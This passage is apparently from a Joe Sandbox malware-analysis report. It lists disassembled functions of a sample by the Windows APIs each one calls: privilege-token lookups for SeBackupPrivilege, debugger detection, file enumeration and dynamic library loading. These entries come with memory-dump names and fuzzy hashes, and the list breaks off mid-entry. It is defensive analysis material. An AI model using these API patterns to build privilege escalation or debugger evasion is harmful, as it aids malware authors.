                                                                                                                                                                                                                                                                                                • Instruction ID: c07e6ffc6c3a7e6482c06200d306031f545548e1037b46c62c472d77c4aae73d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb24d554b556fdc8d671f57bd367dd0002cc258e733202bd551999ba64437650
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE3158712086019FD324DF38C989BABB7E8FB88710F144A2EE19A93290DB74E845CB55
                                                                                                                                                                                                                                                                                                Function 00419CF0 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,?,0041A0B9,SeBackupPrivilege), ref: 00419CFD
                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,0041A0B9,SeBackupPrivilege), ref: 00419D04
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00419D1E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Process$CurrentLookupOpenPrivilegeTokenValue
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3639550587-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 7148b218a58efe162156a67a36f4013a52d7ca8231e1dbe32e75ae0325f5605e
                                                                                                                                                                                                                                                                                                • Instruction ID: f3d016862a4d3342d6fd7035e13c423cea38e9027ddeccfb2464269e0ea5178e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7148b218a58efe162156a67a36f4013a52d7ca8231e1dbe32e75ae0325f5605e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73015275644301AFE314CFA5DC89B6BB7E8FB88B05F80492CF54DC2290E774D9848B56
                                                                                                                                                                                                                                                                                                Function 004631F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 193fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00000003,?), ref: 0046326C
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000003,?), ref: 00463410
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 0046342D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                • String ID: %s%s\$%s*
                                                                                                                                                                                                                                                                                                • API String ID: 3541575487-790581550
                                                                                                                                                                                                                                                                                                • Opcode ID: 299fa53831f00350431557c8593a3fc536372945f534859870c8437012aa5de1
                                                                                                                                                                                                                                                                                                • Instruction ID: c3493345b0c0ceefe68b50463acd725d1f8c1e028979316797af0ed8e7acec35
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 299fa53831f00350431557c8593a3fc536372945f534859870c8437012aa5de1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC71B5711083809FC720EF64C884A6BB7E5FB89314F444A6EF85997391E734EA45CB57
                                                                                                                                                                                                                                                                                                Function 004734E6 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00473B49
                                                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00473B5E
                                                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(0047CF54), ref: 00473B69
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00473B85
                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00473B8C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                                • Instruction ID: 5fbb9a2fc2dc4524adccc28e56c0de5744acadb4307870d4d3e04b8eaaabc2f4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E421E3B8828204DFC700DFA5FC856853BA4FB28329F5040BBE80D87762E77466848F5D
                                                                                                                                                                                                                                                                                                Function 0041C260 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32 ref: 0041C29B
                                                                                                                                                                                                                                                                                                • SHFormatDateTimeW.SHLWAPI(?,00000002,00000000), ref: 0041C2C8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Time$DateFileFormatSystem
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag\AutoDefragmention$LastDefragmention
                                                                                                                                                                                                                                                                                                • API String ID: 750415452-3598614746
                                                                                                                                                                                                                                                                                                • Opcode ID: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                                • Instruction ID: a0b1e6286b276bc7d887fd98d5a7f5957222b11053583dbd66c01ec11ac0fb83
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4115276508701DFD300EF54DD85B9A7BE4FB48720F404A2EF156C22E1EB74A548CB56
                                                                                                                                                                                                                                                                                                Function 004150A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(?,00415169), ref: 004150B0
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 004150C1
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_Draw), ref: 004150DB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                • String ID: ImageList_Draw
                                                                                                                                                                                                                                                                                                • API String ID: 310444273-2074868843
                                                                                                                                                                                                                                                                                                • Opcode ID: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                                • Instruction ID: 64c332f81b35f2aaac3873e7666c404af8577304093a8f0924de00557a4645c6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0D474601B01CFD7608FA9D988A43BBE4BB58715B50C82EE59AC3A00D778F480CF04
                                                                                                                                                                                                                                                                                                Function 004357EA Relevance: 5.5, Strings: 4, Instructions: 497COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 8$n$n$x
                                                                                                                                                                                                                                                                                                • API String ID: 0-2129689772
                                                                                                                                                                                                                                                                                                • Opcode ID: 3fc8ab0f70becb41a8c13356cb3e750a753a9f6ad6fc52484c3dafb684aa1eae
                                                                                                                                                                                                                                                                                                • Instruction ID: 4153cc9e9f9399db15846b8c3dde14c84802a132ab10d275a38415ff115d4298
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fc8ab0f70becb41a8c13356cb3e750a753a9f6ad6fc52484c3dafb684aa1eae
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F81215B3C012155FF728CA24DD9AAEEBB79EB90304F0581BAE80D66284D77D5BC5CE41
                                                                                                                                                                                                                                                                                                Function 00435B71 Relevance: 5.3, Strings: 4, Instructions: 289COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 8$n$n$x
                                                                                                                                                                                                                                                                                                • API String ID: 0-2129689772
                                                                                                                                                                                                                                                                                                • Opcode ID: f118f738c1350e73744dfe955e7318e677de72756cef5df48aea087d3d5b6029
                                                                                                                                                                                                                                                                                                • Instruction ID: 93f6273f9b5baa4d700427faed9b3f5d71219a1263c660ed4af69eddac32f899
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f118f738c1350e73744dfe955e7318e677de72756cef5df48aea087d3d5b6029
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7B116B3C016245BF728CA28DD9AAEABB79EB91304F0541BAE80D665C0D67D1FC5CE41
                                                                                                                                                                                                                                                                                                Function 00435B8D Relevance: 5.3, Strings: 4, Instructions: 281COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
